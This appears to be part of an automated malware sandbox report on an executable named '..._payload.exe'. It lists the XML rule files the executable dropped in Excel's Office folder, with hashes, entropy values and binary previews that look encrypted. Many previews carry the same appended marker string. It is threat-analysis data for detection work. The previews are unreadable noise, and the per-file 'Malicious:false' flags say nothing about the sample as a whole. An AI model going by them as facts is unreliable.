                                                                                                      MD5:CCC2AEFBA3E97CCEE06566435FDFE9E8
                                                                                                      SHA1:962442AA4624391F76A32BA642103793497860D9
                                                                                                      SHA-256:1888262C9CE8F3153F0B3B8DEFFD9CCD69B3295EF63E08E84CB47D59CDA24E24
                                                                                                      SHA-512:3A6851A5412370E149BC6B1C2DA779F31B58BF37683F5453BEC802B184F27601ECA5F6045901E49AB84E7ABDCB4AE22AB0351FE476BC51B7629997EFCEA8F680
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml]..F.4.oB.x...%.L6...s=...^......E\....'.._..2....jZ..W.G.U.$...n..w.'A+......2....!R*.z..<....9.y..-..!.*B.J..i.....jHh/..[K....ho.,.).....n...0v...k...p"...[)...a..t...I^:s.......R.e.7.3\...p..tl.+......,.)Za.].|..}.yc.MP..I.'wi.........k...*o..m....'..3..4@...T].(...P21...T6..!z\.HS....+...8E....u..hX..F....7...q...<aIyN...........t|...j.FE?:....p.9..~H....4y.>[....H.Q.?.k|g.'..[..h#z..]h.Z.@.{....4.Z.8..l.\..)..1....~.Zv.7...cl.4S$..,.e..P.d.._.n..SK]n~...G..Q})M..E.}..^y...A?.LW%.....o.N.m4R.Sp.\...... P^.%..E.g..s...l...Z..KM...9%c..l..I.j.#..p.%.%yNdU*.9..C.Iz......q.y.sM...*.k.8.o..^tW.W`..T+.......\X.pY ....`RyP.@......h.R1g.>....|...q....-#_..7v}/T....9.!..Y...:..~R.%5xr....y.x).iq.tq0}*,...8...Uu.d..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500007v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):767
                                                                                                      Entropy (8bit):7.706484222796187
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:LY6RN6X/6CwdUQhVhIunobUWfqXhWCnRMAx9IotF6mwnTUdnrnv6cii9a:LFN6X/6td7hVhI/DgHvtImHdnbv6bD
                                                                                                      MD5:0DE048D6B16AAC604EB2BD002D97D273
                                                                                                      SHA1:1B56F7F054158CC611CFC436F8C701ABF3315DFE
                                                                                                      SHA-256:0AC2C180D21245A951E8AB4F60B961076B89674DEAC9641EC8BC4A3D003B2D0B
                                                                                                      SHA-512:2F683DFE8E175BFFD65CF76DCF697495821916E48014BC7FEAED7807DF04E0278B9CDBAA01B0565F5702CF32E06D0997F13E06E1605262FFE23F88DAB4C722A8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..-..?r?p:.}d.=......j.!.(......l../D.....qg..7.z........wk.m.oy*.r.E.zPq..y_.Qb^..+3R........0AZ.A....^.oX. . .N...3....8T...rz..T/......D....Ne........|......K.e...).k.K...9...1....."...N.S].b'...C.A.u.../.9g.]e..i...k^...d..G..Z_...X..:....F.S..(..B........>W...6.Y.Z....h..~..H.A%..\C.BEJ.-K#9.u..Bz...Z...D..F...._..A.y..b.S\.A.(&.?.DC.P.G..0..:...SA.7TB.n-...6.[...Wa_.W...3.g.h7.........|.N@[(.....-h.'.A0zc).......k....,{....m.v.=....8.....N..1.E>.4&.a....[Y`........=8..V..,.#.C.*_.....Ca.8.......h.M0..x.=..;C.7=..0e&*..75.."Gm.!o%.`..6J..........jd...C....1..9.v...X.)c..~m........G..P.V.\1.M@u..Y.i..S......VL.n....m...9_...N.L....!h7ohZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500008v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):845
                                                                                                      Entropy (8bit):7.726924290894983
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AIUhWM0kQ0t52jQY3hje7dLzzdlWidUFawHsTAaf6v6bD:Af8+Q0VYRjehHxlWiqH4Aaf6wD
                                                                                                      MD5:4FC343EA65E31FB1FAA137C9A7E8BE7E
                                                                                                      SHA1:370DC033D3C8D2DBDA6D96F32F64DD5C93CE967A
                                                                                                      SHA-256:19BA13E5B6BBB11FBCE4309F24FF49AC41C01BC0455019219683D4FF32BC8D23
                                                                                                      SHA-512:C5645B111BED1E907FF2A85775CD4E24C19FBA629AA1D079C148CDFB4CF8E4C0A19A6BDAABC56260B811A440B41A04C90D5F730EBD0F8CFB90BD4172D2197195
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.B.Tv......]....q....>...MgRP0....d.W..D=...u..-....`....h...$..J.....m9.vg]j.>..d2E:(...... d.-..~...E.d"-Sm. ...LRYE$....._...6[S......."..&`d.5......+.j...._......i...>[.".....H.|.0Ut...)....v.9}.....F....:.$..H.......d....v..i...g..[-A.I.7..St.G.eY.,:J@..*...[@......3_F....U.m0.O.GC4..._.I..2..........\.....Z|.......".=?.....r....,........Z.a..)i.....&%'.E.N.3E.~.B.27...?Q{.ucq.#.V..Z..v..J...'..Nu...O...N%7..z.cGwV.@.....oD._...jJ...+*^......xu(k..X.N.....&'...".{{...V..!.......rW..u.<.@:.oU3..J.0.j.Y........ .....A.;9.C....5.=...[.........s.S~.b...x.$o....~yt.....==(.#L.<h./.i..G..**.@0..v..F..........9.H&..m.7(...r,........rwUj#RD..._E......S..#1...x..N..;...>...^..'.(.N.*S:*.|6d..7..9"..Ue..js.r?l.C...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500009v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1233
                                                                                                      Entropy (8bit):7.83770307919226
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:cXnjNC8PwErd551BZV/uNd+a7enLiBg2S5pspDiw36ezE9YfWJrNjbPcW6aB2uHJ:czIOwEHBZV/taSLiBgJeDiN9jJrNjjcU
                                                                                                      MD5:443AD38BE6E487A759EC151B48449184
                                                                                                      SHA1:00DAE6E5C0B188E356CA61E3C908264560DB34CE
                                                                                                      SHA-256:27258833275D569E3218F145B4A38FD89DE60CAF18C95F48E8AECDCD25410999
                                                                                                      SHA-512:CDF8504E004D85029E281E93B82AC138013ED67DA3043DD7DCD66F43A5A3A5602CE09A6DAF08EAAD007E7096B74214C98B2BE1BE70D72562E427025CAEA4065E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlkF.O... ...;......F.h.j..qCF8....F....$0-..K*..|-u.>.p..,.,ZS....2.0F4.f..?.Ba..o&......H..3.7K...{+.@..[^.(Jd.$.#..../....5aV.i.9...WH]....|.Ds.E.?...6i.".,9.W'C..u...........}...x3...e.[..|c.i....Dh.j........0....`.eF..Z..z.._.C....._....}..s.V.^=m......wRe.c.........a.,...-u,........%.E....=e8.....>X.-...[.&U.....8....s.=...LMi..h c..cj|.c...g....~}.fL.n.....P..f..8`...^..r|.x.z..T'.^c......o.8...;t.....o&..|J#.J.b.^.M?T.8{.9P.vL.......L$.k.d.d..WD.R..... _\?. ..&.*...;..=d.<.sQ.!.+..]IM...j.v......0...d-.Sl0...d.5Y...-0..@...t...X..[.r.m.m.z..............3.@.nn.}.....)..:..MS../...(e.v7.N3.....5._.{7....$0H.@..|....i1.*...\&..^...R.y.]>.{.F8m}q.&.......9..Y.n.7zsc.}Gc.w.Wu.A...|+...Zh..Jl.ULT'....a.w.Q.gy..:m.*..aLG.D.q...s...2c7..q.O......'..."$.sqO.....n..^.Z&..k...?.ry."...h.0,7..>N.$....CA.^..T..*..6....3.0#... PY!r#.v%.fa.H.3..SE.c....~"q.=..O..[.n.....13D%.P.....=.T...D.!.[N_..&.Fa.K{. *q.Q............%5.L<.S.Z>k.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500022v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):934
                                                                                                      Entropy (8bit):7.758804337579639
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:oipXvnXaFVT7kK1O73tqIMMFTX6oU+v6bD:oYXfiM73tqxoU+wD
                                                                                                      MD5:6F94B8BFAE1F2B29F424FB05F9AA6A61
                                                                                                      SHA1:99EDDD8B824D387CAC138E1E76144D9870361F21
                                                                                                      SHA-256:1041B4E38C90CEC16BFF7893B37044F3F324559DE2C06F47F6F0EC801714F10B
                                                                                                      SHA-512:D24DCCD7C90CF5D450E003432B763D17C2CF85AC27F54C871F5DF8DF5D24BFCEB4C098DFC873458C57C33C34B66B36BAB1E1781AE82A3F49026848EEEACCE686
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..O.c..yG.Q..\..&...7.ik.{....&..`...>._Hv..dy.,......Z.%.S.&.4...q.D2..>..^."RiY..j....../:iD>`.w.fpcy../.....M...S.~..#.....S.a...n..aQ-..s(.....jK.`;..E%H#X.._..i..9.3H.....*M|.'..?.*...U.x........"O..:/4....v.......Ox.$4..8.4..|.Ty...P[...q\...S..,3..Mw..2...39......F.A."..&qU..:..Hc ..Dl]...lM...O.)3..."O.....|5L.....2...Q..C.............y|;.(..yfP.m....R..8....>\s.*....@..F..G..ML......O......}..rX|APS.....(.A:..k.....|.....q.......|.fw.....^...^..%-.{.-./....J.5z)[.w.I..W.k..)..>...3...5..*...T~=..?z.>X.......qL4^Z.......D2."...X.:x.....E.r.E...i..Q.0,5T`+.9.3.x....6......<`5D.F...j.2.?...G...V*;..I..[..E.Z?..S}.3.fH......y....t..j...x>.........r...Lw......k.b....3.@g...z..I1...TD.g.....k......N..V.....:m..*kW....Z"...........9@.Bk9*..nJ.O.@...N2.3.;..@E..o.o5...*..i.......s*%`u..l8}hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500023v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):969
                                                                                                      Entropy (8bit):7.803545835056489
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ThHu8Qu4FlsI5XZu1G8rJZSe+46lRPD+znv6bD:lHUu4FaiXZuxe4WRrknwD
                                                                                                      MD5:BC41024DCB0CCF9E6FC1C50D6B2F6589
                                                                                                      SHA1:ED3E4E9C511AEFA58D2F7CB1D5BCDF725287245E
                                                                                                      SHA-256:436FB226A24F9AD2E83895360F423608AD162208E4AB9F926139A3DE76D1968B
                                                                                                      SHA-512:334629606DB6686AE86493F46519C0F61738637A5A687CB71B0EA8E2D4D7A9C475AF3B33E3D95D92CDA24AB9C7C7BB746E391F20C2AD6C8CE3025BE18E9BCDB3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlFog..-.Y..?.A.p.?s.j..."....l!...T......Z...`....X.!.Z.4....]...6'9(ID.`...Y..9.Q*X..W..O..R;`.E..9.O..2.7c..i\_..."=N.:M~....S.uyF.`.............?....83.Ls..P..\..&V...[./....P.%J.oG.&(.{7.pn..'./.Eo.JO..&....*1E.kb.Q.em. .P.z..5....K.?K...+8e.Q0...J.~+&&.N..D.N...H.5.f......|.+...h/......d.QEno21.....p...#....n...}.X.c..i.Rh..y..N......C....*../..bD.q.vgG.....B.{......$;q........>.R..g..R...r.+.|.$..$.w......E../l.~..c1...P......N.N.l.....v.......1..Q..|....j.~.,k........g....U..Z.Y^F..[..q..i.R?)2`..u...4K3Ei.l..J ..Z./.P0....1y...'./.4M"..m.]..J...l........s..P..}r.J.#c..pX..........8.".3.c.*..._N[|............u.0<M..jCH.`..z..6.@........h...C...nb..w.1A.S'wR..}.af.....k.o.+..Rm...x.....e..!...Mt|. ..8I.Ah..".!.qf4.....X.,.q..J.z|D.&~.B...../.C.1.D0..j..d..U.a8......m...]F.wz..\{.Ch..PHq..!.....V...<....N.T..<.Y.Mc(;\..~hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500024v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1467
                                                                                                      Entropy (8bit):7.87054588834093
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:SqoMhomXYH6MugskW/4PfIecRF3cegkQV6GJAypNTDhYOxF+iTy2mM+z0q1s7NIO:hGn6ljaIecRaeg5V6mTDOMvr+Iq1s7NJ
                                                                                                      MD5:BE016CED51334665DB745542D8EAC578
                                                                                                      SHA1:7F7204266889D3C54373311481C201806556EDD7
                                                                                                      SHA-256:F5559653ACD227B1CE175F0CD6AB485CB115C5E40658F173895BE1DA06822FF1
                                                                                                      SHA-512:318B73ACA38222E124C0ED2BB359E250C9088FA59B830631AD2B07C219285E22A3EC99467087F662B7112503300ECE776D2F23014895046757B35A3E65643454
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml2. .x.i.RU.6]..Re=.......-.O.....]....C.h..Y..X...]..b..H. .x..|7.;.~N.0a.....A..A....p......`..'..~..7....?....{...+.......RO../%..B.m...f....U.c<I_Vt.....>...JH2...H~..?3%..{u.jN.|....Ov......MnP.z.;..z.T.Hw...*U........r.*m..[..^...v...ANXh...m0.!.SG..:P.Fg~./{.- ....E..$...p.X.......M...n....UIq.2..H|.~.......j....P....wX&g.a=.R.5./...@.v.Q..0.{@..&.._8.?....@uej.l.(O}......7.,.F...D.,.VEE|..2.....>@..).2+..$......i..5.!p...0..(..n.iEks...t.l....&..oi.......8...............W9...W.....J.....?.^..w.B.(.;2....2.6mBQ..S.:,.JD...g_#...v"...?.Y..D9..y..f ..a.m)..;u..B5_&wy......us*.~`.v#..]......><.#...i........%.......I.~}+c.lMm.K...;\..Fpyb....U..4CiG..YPN;.ch..g.ZcQr..kK..Q..UN.).J.4.j..Zz#.........lR.T....$...0..X.t.J.o..<?.CD.44.&..N=T!..n.......s. F..E~.i).5.......I.....$.}Cw.I.{...e]....YfhK{...c.F.!t8rE'=.....#+A..-...{C.q..B.K..eO.|...b.j.L.e.W.0.D..m.c#......H.U..*tf.?.c....Y.........t>.....Qvb@...wiz{.Mi."w>.I>.L..K..g.x_....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510000v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1397
                                                                                                      Entropy (8bit):7.851129665033156
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:gOggBpXO6NSJBo/oBUdBTgov4TMfqxry09xD6cKfjlh4tyC7OoJIEIRGmEx69DIs:gO7fe6uBo/4yBsfYilxKfjlh4tXdCGm1
                                                                                                      MD5:FAE081BAB9F7A20B69DAA891993DD943
                                                                                                      SHA1:F3643DBDE9DE9D3F90ACA2A8B511C997FE130819
                                                                                                      SHA-256:16EDE570CE9DB156D534F9E5C3A2C6603FF8A8A8FCF35D5158769136D0434689
                                                                                                      SHA-512:901AD321CC4D181AC84E8E4872045958222137ED2AF4D8AA577FBDF0F42F9DB4B78D40E265D3DECF21DCE7EA39D657A13A94E963EFB788DCC3E4CFB4F6333BD3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml,kJ...7..C.X.4... ....q.X }r._.+.4.k)A@M..{.+..Zv.....:....`Q.(.Q......(...x( G}9...].Rh?..T..6......./.w{...k.s.s.%..'.r.-.+n...~...Ry....Y~/.1....J..-i..)..M<.5bk../.".j"..<.Va..n......I../..;.u>.?M.(...@.r..A{.@O;.F..Z.....J7*.l.|P.v......9!.9....|@v.Hl#R:..q.R.V#J..,#kB}7..:(.& y..S..Y...e.=`4...w.nNg....B/v.C.K.\{S.;m.........c......s^u..(r.N.....j;.......\U...+._.....UA...GA......pO.G...i......>..<....*.>Odio+.of..2^t..T.r#..Y.Y.ga#.O..4..%3..y.m..L...!......&...A..~...7^..\.....Ek..*d#.,m.Wt..:....Pf..;y.....+.`O...........z...e..i...FA..b...^..2.W....._.5.._.5Z.E..n`3...V......\m..9.?.E.JG...5{....T.aIb.?.@y...8..Z..CV"] ..n.3.z.*...I.D.Y..ex&X<+8..=.k...<.1.-...B.d1....E......_~...(.#%.(.uX..}...\o.$....8|v...5..=E.s.JP.r....3.%.tw...=>o....\~.|.......4.6.C....l<...(A..."...._..T..i.7....a.....b.......0....P..a.I...U.Z......-[J2Sn,.O..@j".....|......}.......B=.x.O_..}.K..I.^.C...e.C8.pE``..J..J_....:^n...z.4.....u...!.3$...L]...H

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510005v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1269
                                                                                                      Entropy (8bit):7.843310136751097
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:aiCtME75FyQTJ/XWHn3+uRX5YS1Nv7XusZr3pjhhJJRj4TQyXov6bD:a5R7b3TJ/Qn3+45L1x6Gr3xhhnF4TQyB
                                                                                                      MD5:793550DC93D13B0DCE520C903C860D05
                                                                                                      SHA1:86C52FAEEA97B67AB4514A94ECA02E2F77C054FB
                                                                                                      SHA-256:30761600AAB632BBFD175123A92AA45FA4F01FEB57CC6A5412B7D73A3B918AE4
                                                                                                      SHA-512:4C06671EE46C987CB38F86C6DF2F703AF595BC1F674EF6F7FF6C2E58A7F3CCDCD13A93195B56CE20EE894F29EA69A236BF559F74A57C8E2BDA9E050D6375CC90
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..v....@.I......l.1.=...2..*&.....(...3...}..r..|..yv2.-N...cn)..4.|..0....4.....Nt..o!....VC......?..#Z6.......J@.....b]h[f....6;E%X....Y9.m.....,*.~.gQ..J..\....x~#.[...\wSU....}.uH.q..U0...S.....$...R.S.p.....! ...z..^9';.......-... K.H.n.=...d.F.2..<.3.(8..)..O.2h..E.j.........|.A..U`Kq.,.9..f.xHzV.A.R....R.=O.[.#Z..A.%.....>....`.=w.{...T..izj,.....f.....`g."Z........U.7..e....b.......x.2-.dB.zW?."TiY..1..jrM.Y_6.d.R.D...v..h.4D.......Y..0...nF....E.Q..)./G.:...8...c.O.96<S......hs...y_.wwG....U....@i@*..M....xT.E.;..R......;.6S.&A.B..-.y..h1..&....+xO..%o.........]...P..M.#c{.o}1..Ib)l.*(.+rqs........,c@J..........<}Z...5v.!y../.&?.0T....'.<|.).......?..@..=?.....O.6./.....-.1R.f.WL,.f..e?K.@..RER.u ..j..:..D...;\3g..K0.cOg.M.5-[.=.Z.......h...w]...."..pGu....^...]3.W.Ha&.T.j.B.....4F...g*.o.2iyK.Xu.i.GU6... ..z....j}.T.."U......-~3..].FkA.6.....QP?.t....`...zt.X..l.../OO..........&.....N.!....S./{l.o...`K..[f-...{9..}........9.GO

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510006v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1088
                                                                                                      Entropy (8bit):7.791628544982946
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:5zIg/mgFpttD8RK6UUW2n+Qpv+Sm+uCE1qvm0gqd/AgOJsNbI5Agv6bD:JIHgFlD8RK6q2+QZv3rOO2FMbI5ZwD
                                                                                                      MD5:DC7383ACC83CB28C2707A5914AE74CDE
                                                                                                      SHA1:E923D72C4BE421970A8BD955B0D8C305674BF707
                                                                                                      SHA-256:57E9C437FB3CB299CC1610EAFAAC8082C39F1C5E9A3C7664BA5E81BF9C6A2522
                                                                                                      SHA-512:60539B1449854CCE85C0D56C8D56BC5B3837EB1D7F9F489C1A21040174B747B7D58E7DB06F204FE1232BF5D02DEC0E87682F4B6AD7393EEB447043A97974EF78
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.|gHT;.T.Rf...[{..".5A...z..GL.....X...K..3-.M)._.#}azV..UW.8)..."..HE.>I..]qi.w.v.u..xxbcE<..a..ZB.:"..,.,N.F."7....)?..Uq:.`..5.M...K..z4U.<..y...?.k9..}.WM!Y.R..H...+.1."f..q.t.....p\..;.%P4A.ss..(.S...3.l ..H..\J...BaN.-..T...RAS..m.QO...H%._.K...._.U|.*.r..r.........V1.\*..B^.$:}.2.....v.]...I.M]...8...D...0.....:9..............z{..J.U7.+.YZ.o.X2....U.7h}...X%.`Y...,u........Gg.%.8(<F9~/.P.jnV.WjYa..u.Q......9.uLNU.R;.VM..$W:...f..."....E....R4Z.wj...0n...@.n......x...Q.9.U.D.q|N:^..r.*..'.<<..".!.OJ...._.{.7QlRP2...|.B..M.....7<.......MR..3.x...oYBx.lQ..\.I`...0 .KK...c..`.y)[.If..}M.O.`s.~_...3..H..o|Z...YZ.c<.....w....4...0.J.X......~q.\...n.#..t...,s3..~.......B.*.P.f..,..h8.....%.?...L..q.'....5~q...9...9.f..Y....b.6/...9...O.9...&..N.b*..`..;..N.t...43vgw.9..4..@B..W.&5{.w>..z..c.....$.....2.......,..5..S.#...........[.'.A9.v..<...Rj....+s.g.s........]..Zg.bt..z......i..P.^....D.;2yN.x1f'nS.....v./"*..9......h....._[...n.lm

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510008v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1100
                                                                                                      Entropy (8bit):7.819320349474545
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:xQpylTEz8YK0tz4h4sRFDsiOqIHpU2Zy3v6bD:gyaas4hLRFDsitv2o3wD
                                                                                                      MD5:030E1350E327F391E2115ABDB9825F97
                                                                                                      SHA1:69FD57878EF353A5678ACCAC0DC1E4018C693BC3
                                                                                                      SHA-256:80999F5C12A5BA7400069CEE035AD0A805F971197EAD0DCDDE78B534A30F5CB7
                                                                                                      SHA-512:E8CC99079FB45E83046E94F812EC26B9BDE28037ADE3B49F378068EC07FB06CD19732F8883F99246AAD58F034EF36BA6BDD9B115B4E4BD8F19EAFC97DFD33AE8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlv.....x......".......jC......N...}3...e..z$N..4]....}u..4..u..%.<Dg.kqq._..}..ld.K..".L'....w.....C.K'=.kA.($J.1R.6.o..A.w)..iZ.%...B....+.7.4~m6T..n...?{..../.........9xa.._1.|.cqxs............$..$.....5......E..]..).+.,..:..O.c....X....v..]L\e..0p.......|{a*Q.H..V..ld....<..]i.l......(..r.&]A..e..F....f. ..l.>(.l}u(....L.k..%.......O{_...qP......3/.W..t...J.&...&.?..B.g[&........=..}.+Y....V..~m9+.z~...j.S..]./...I.].P......4.5.2d.F.)....>.*..:...0..?.....U.....`B.7.I.......g=LI..%.-B(+o......SqG...a.&.\....8.&I.5..".l..x.A.E4L....M#..P...W..o.....p...`...i1.|.LS...>.F..Rf(4.....{..R...>U...5j..E..B;PR`....!.!..t._...>.....<&gf2Kg.+.....B..WTI..r....&.}1../...|@...k.~.)t\.......D...r.rU..96...<5..i...o..Ws...Dt....._D.....!.'4.r...<F>..EnJ.U.}...N_U...a.yP..........zi..]5.........;C3.W%@...>>.3.4&q.e.|^."..v.0P...J..@..z..4E.t....0.kZI+...}.rHd...vn>:g......D..(.QM.....(]..'..y..Y.Ua..Z...C...##.......3.z.J.1..[8.4*.........?...Ox8...4.u

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510009v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1192
                                                                                                      Entropy (8bit):7.835099659091168
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:JSK8zk574tDtRGlDovL9fjJE1u81SGUocNdKx7IfapF/rdcf3fiNzOv6bD:JS3zoO7OsvL9fjJFFpJNdKVIf2lSni0s
                                                                                                      MD5:CCE33E87B29A4481DCC83AC418DAE944
                                                                                                      SHA1:35A59B9B5391C849E3AF747C42E489F9EEC1FA58
                                                                                                      SHA-256:BD95FD2A7A1947294D78E789CE3AC5F591351A37C2D777202FF4C3A77EC210E2
                                                                                                      SHA-512:3CA36249F5386EEC736AA01D037632A639FDE92DE15117F7F3C81AD1EF34F51039CAA8C4188784AA4CC97CEC792B54029817CE17BF08202028F6106B3E227B5B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.|.......8.loJZ.._....5.......V...D..........vq.B$...`Z.t7....j.Z.o5...)...YG1L#.R.V.0...Q.......d]c.1U.+n.`o|u.1..BqcI.;.v.q..\$V....@$T.<.....w"..r.W}....8...}...!...jvI.......Z.....^8.G..d......%<..&.....p../.6......w.{.2.% ..^..V....(..x.*v.K.s.P..,..w.....`..#R5'.C..y..!.w.J.<.?....F..on$.3...A..=.....i......e?.:jJe.cP.0@..>..q...O1@L..s.......|O.J.L..+.....2(..$8..).I..I.L. ^."......R.k_..%..92m.|..?..Bj...?6.O.4.t+;(X.f..........02...ug......fC..b<}.R^F..uzz...a.=R.H..*......|..$.........Z...#..s-o.[\7Lk.B.2V......u#R.[.....d.c..Oy{...n #dI..Ff......D......,..~.9..D.T8T............%V..j''.uQZ......LvYpu.Z....f.E...`0f.g.p...m..i.e....l.}.V.|.E)..`.......X...]5.....b..:..o..*.T.t...?PBh7#;..w.ovP........../.[...k..]w.@..P..5..3.v..*.d....QW....qWVj...v.......Lc..R.Z...o......./.Hn)f.."(.N........n...........yQS.OY.Y.4h... .wm..R..8t..;.Hr..3...q8'=hkH.9...'.k...G.c4..X.0.X..A.R..$.!...}|.N...gS.=...;......T.<.W"U.&O.R.l..e/J+...j..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510010v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1031
                                                                                                      Entropy (8bit):7.811010181896187
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:fZQ4giQxv7CDeUFhwRTbcHpEXeXvOzDik7Xq3zSgy1v6bD:m4Q18FhwBcJEX0Jk7UzSgy1wD
                                                                                                      MD5:8D2AF09B96482160A18855F3E3829792
                                                                                                      SHA1:6362DCFB62E1D7BE575566C00C17C31B155FEF4F
                                                                                                      SHA-256:7AB671BC14EC15C0E3D5C5E0B5F68F2707AABBCCF3BFF79931D6BBD5875E66AD
                                                                                                      SHA-512:50161708426CBFB6F28F6E97B9735CCF2155C4E3EDBAC8514A2D647D09B237DB7321B9D8E9842FE6D93D2D93F545DA2FDD7FE94E716225D948C32FA5500F9CA4
                                                                                                      Malicious:false
